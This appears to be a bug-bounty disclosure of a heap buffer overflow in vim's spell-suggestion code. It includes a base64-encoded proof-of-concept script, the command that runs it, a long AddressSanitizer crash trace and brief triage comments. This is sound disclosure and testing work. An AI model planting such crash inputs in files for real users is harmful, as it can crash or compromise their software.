Heap-based Buffer Overflow occurs in vim in vim/vim
Valid
Reported on
Mar 12th 2022
Description
Heap-based Buffer Overflow occurs in suggest_try_change().
commit : d0b7bfa95798f5ec743d8afffbffb83aeac823da
Proof of Concept
$ echo -ne "c2UgZW5jb2Rpbmc9aXNvODg1OQpub3JtMFIwMDAwMDAwMDAwMApzaWwwbm9ybRYwCmZ1IFIoKQpz
aWwhbm9ybRZpMDAwMDApCmNhbCBSKCkKbm9ybTF6PQplbmRmCmNhbCBSKCk=" | base64 -d > poc
$ ASAN
$ ./src/vim -u NONE -i NONE -n -X -Z -e -m -s -S poc -c ":qa!"
=================================================================
==127228==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6120000212f8 at pc 0x000000430f36 bp 0x7ffd494cbe70 sp 0x7ffd494cb630
READ of size 1 at 0x6120000212f8 thread T0
#0 0x430f35 in strlen (/home/alkyne/vim-debug/src/vim.asan+0x430f35)
#1 0xbb0404 in suggest_try_change /home/alkyne/vim-debug/src/spellsuggest.c:1188:42
#2 0xbaa268 in spell_suggest_intern /home/alkyne/vim-debug/src/spellsuggest.c:1004:5
#3 0xba6e13 in spell_find_suggest /home/alkyne/vim-debug/src/spellsuggest.c:879:6
#4 0xba37da in spell_suggest /home/alkyne/vim-debug/src/spellsuggest.c:550:5
#5 0x922c10 in nv_zet /home/alkyne/vim-debug/src/normal.c:2998:7
#6 0x8f406d in normal_cmd /home/alkyne/vim-debug/src/normal.c:930:5
#7 0x6f763d in exec_normal /home/alkyne/vim-debug/src/ex_docmd.c:8670:6
#8 0x6f7243 in exec_normal_cmd /home/alkyne/vim-debug/src/ex_docmd.c:8633:5
#9 0x6f6fa3 in ex_normal /home/alkyne/vim-debug/src/ex_docmd.c:8551:6
#10 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#11 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#12 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#13 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#14 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#15 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#16 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#17 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#18 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#19 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#20 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#21 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#22 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#23 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#24 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#25 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#26 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#27 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#28 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#29 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#30 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#31 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#32 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#33 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#34 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#35 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#36 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#37 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#38 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#39 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#40 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#41 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#42 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#43 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#44 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#45 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#46 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#47 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#48 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#49 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#50 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#51 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#52 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#53 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#54 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#55 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#56 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#57 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#58 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#59 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#60 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#61 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#62 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#63 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#64 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#65 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#66 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#67 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#68 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#69 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#70 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#71 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#72 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#73 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#74 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#75 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#76 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#77 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#78 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#79 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#80 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#81 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#82 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#83 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#84 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#85 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#86 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#87 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#88 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#89 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#90 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#91 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#92 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#93 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#94 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#95 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#96 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#97 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#98 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#99 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#100 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#101 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#102 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#103 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#104 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#105 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#106 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#107 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#108 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#109 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#110 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#111 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#112 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#113 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#114 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#115 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#116 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#117 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#118 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#119 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#120 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#121 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#122 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#123 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#124 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#125 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#126 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#127 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#128 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#129 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#130 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#131 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#132 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#133 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#134 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#135 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#136 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#137 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#138 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#139 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#140 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#141 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#142 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#143 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#144 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#145 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#146 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#147 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#148 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#149 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#150 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#151 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#152 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#153 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#154 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#155 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#156 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#157 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#158 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#159 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#160 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#161 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#162 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#163 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#164 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#165 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#166 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#167 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#168 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#169 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#170 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#171 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#172 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#173 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#174 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#175 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#176 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#177 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#178 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#179 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#180 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#181 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#182 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#183 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#184 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#185 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#186 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#187 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#188 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#189 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#190 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#191 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#192 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#193 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#194 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#195 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#196 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#197 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#198 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#199 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#200 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#201 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#202 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#203 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#204 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#205 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#206 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#207 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#208 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#209 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#210 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#211 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#212 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#213 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#214 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#215 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#216 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#217 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#218 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#219 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#220 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#221 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#222 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#223 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#224 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#225 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#226 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#227 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#228 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#229 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#230 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#231 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#232 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#233 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#234 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#235 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#236 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#237 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#238 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#239 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#240 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#241 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#242 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#243 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#244 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#245 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#246 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#247 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#248 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#249 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#250 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
0x6120000212f8 is located 0 bytes to the right of 312-byte region [0x6120000211c0,0x6120000212f8)
allocated by thread T0 here:
#0 0x499c8d in malloc (/home/alkyne/vim-debug/src/vim.asan+0x499c8d)
#1 0x4cb0e0 in lalloc /home/alkyne/vim-debug/src/alloc.c:248:11
#2 0x4cb039 in alloc /home/alkyne/vim-debug/src/alloc.c:151:12
#3 0xbca715 in vim_strsave /home/alkyne/vim-debug/src/strings.c:27:9
#4 0xba364f in spell_suggest /home/alkyne/vim-debug/src/spellsuggest.c:540:12
#5 0x922c10 in nv_zet /home/alkyne/vim-debug/src/normal.c:2998:7
#6 0x8f406d in normal_cmd /home/alkyne/vim-debug/src/normal.c:930:5
#7 0x6f763d in exec_normal /home/alkyne/vim-debug/src/ex_docmd.c:8670:6
#8 0x6f7243 in exec_normal_cmd /home/alkyne/vim-debug/src/ex_docmd.c:8633:5
#9 0x6f6fa3 in ex_normal /home/alkyne/vim-debug/src/ex_docmd.c:8551:6
#10 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#11 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#12 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#13 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#14 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#15 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#16 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#17 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#18 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#19 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#20 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#21 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#22 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#23 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#24 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#25 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#26 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#27 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#28 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#29 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/alkyne/vim-debug/src/vim.asan+0x430f35) in strlen
Shadow bytes around the buggy address:
0x0c247fffc200: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c247fffc210: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c247fffc220: 00 00 00 00 00 00 00 00 00 01 fa fa fa fa fa fa
0x0c247fffc230: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c247fffc240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c247fffc250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00[fa]
0x0c247fffc260: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c247fffc270: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c247fffc280: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c247fffc290: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c247fffc2a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==127228==ABORTING
Impact
This vulnerability is capable of exploiting the binary.
We are processing your report and will contact the
vim
team within 24 hours.
a year ago
We have contacted a member of the
vim
team and are waiting to hear back
a year ago
The POC can be simplified, there is no need for calling the function recursively.
to join this conversation